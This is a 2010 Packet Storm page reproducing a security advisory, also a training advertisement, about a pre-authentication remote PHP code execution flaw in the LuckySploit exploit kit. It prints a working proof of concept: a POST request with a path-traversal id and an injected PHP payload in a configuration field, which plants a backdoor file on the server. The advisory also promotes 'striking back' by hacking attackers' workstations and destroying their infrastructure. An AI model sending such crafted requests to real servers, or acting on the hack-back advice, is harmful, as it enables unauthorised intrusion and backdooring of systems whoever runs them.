we care because you do

LuckySploit Exploit Pack PHP Code Execution

LuckySploit Exploit Pack PHP Code Execution
Posted Sep 8, 2010
Authored by Laurent Oudot | Site tehtri-security.com

LuckySploit Exploit Pack suffers from a remote php code execution vulnerability.

tags | exploit, remote, php, code execution
MD5 | 85e8c9b4ebc0d14c3a1484e7ae6af22d

LuckySploit Exploit Pack PHP Code Execution

Change Mirror Download

Gents,

We wanted to let you know that TEHTRI-Security will release many 0days
and offensive technologies during a new training called :

- "Hunting Web Attackers"

It will be proposed during HackInTheBox SecConf Malaysia 2010 in
October, in Kuala Lumpur.

The 0days will be disclosed under a NDA (for students only) and will
help at fighting back web attackers, as we already explained in the past
in China and in Singapore (SyScan).

As a teaser, this email contains one of our remote 0day exploits. We
also found 0days against Zeus, Eleonore, CrimePack, etc.
Our self-defense cyber-weapons will be disclosed during this training.

------ BEGIN Security Advisory ------

Vuln : TEHTRI-SA-2010-018
Tool : LuckySploit Exploit Pack
Title: Remote execution in LuckySploit

LuckySploit is a tool used by attackers to penetrate companies or
personal computers by abusing client-side vulnerabilities. This malware
exploitation kit is full of anti Microsoft technologies.

By auditing this Malware, TEHTRI-Security has found a pre-auth remote
exploit in the file /mod/to.php

By sending a specially crafted HTTP packet with a POST argument, it's
possible to simulate a configuration modification, and to inject PHP
code that will be able to be executed after.

Here is an example, where we modify the remote file "7.php" by adding
our own PHP code inside it (PoC anti kiddies: phpinfo() added).

POST sent to
http://target/luckysploit/mod/to.php?mod=thread_optn&id=../../tconf/7

With arguments :
z=1&exp_pre_config=2&advanced_unik=0&referer_not_empty=0&JS_MODE=0&unquie_type=0&unquie_time=10000000%3Bphpinfo%28%29%3Bexit%28%29%3B%3F%3Eaa&stat_packtime=10&country_allow_list=&referer_only=&traff_back_url=&gzip_status=1&gzip_status2=1&ip2cos=1&system_status=1&referer_status=1&puniqstatus=1&puniqblock=0

Then you can access your new remote backdoor here :
http://target/luckysploit/tconf/7.php

This exploit is provided by TEHTRI-Security as a technical proof to show
that defenders who are under attack, might be able to strike back
against a group of evil intruders trying to commit cyber crimes against
them. But this should not be used out of legal field.

This might help at getting the identities of attackers, or at hacking
their workstations, or at destroying their tools and infrastructures
(anti-cyber-war & anti-cyber-spy technologies).

------ END Security Advisory ------


If you want to be sure to have your seat for this outstanding offensive
training, please do register as soon as possible (Technical Training
Track3 / TT3 - Hunting Web Attackers, 11-12 October ) :

http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274


See you soon at the awesome international conference HITBSecConf
Malaysia 2010,

Laurent OUDOT, CEO & Founder TEHTRI-Security
http://www.tehtri-security.com/


* References:
- BBC => http://www.bbc.co.uk/news/10349001
- Zdnet =>
http://www.zdnet.com/blog/security/researchers-find-12-zero-day-flaws-targeting-5-web-malware-exploitation-kits/6752
- Btraq => http://seclists.org/bugtraq/2010/Jun/178
- HITB => http://conference.hackinthebox.org/hitbsecconf2010kul/

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    11 Files
  • 27
    May 27th
    8 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close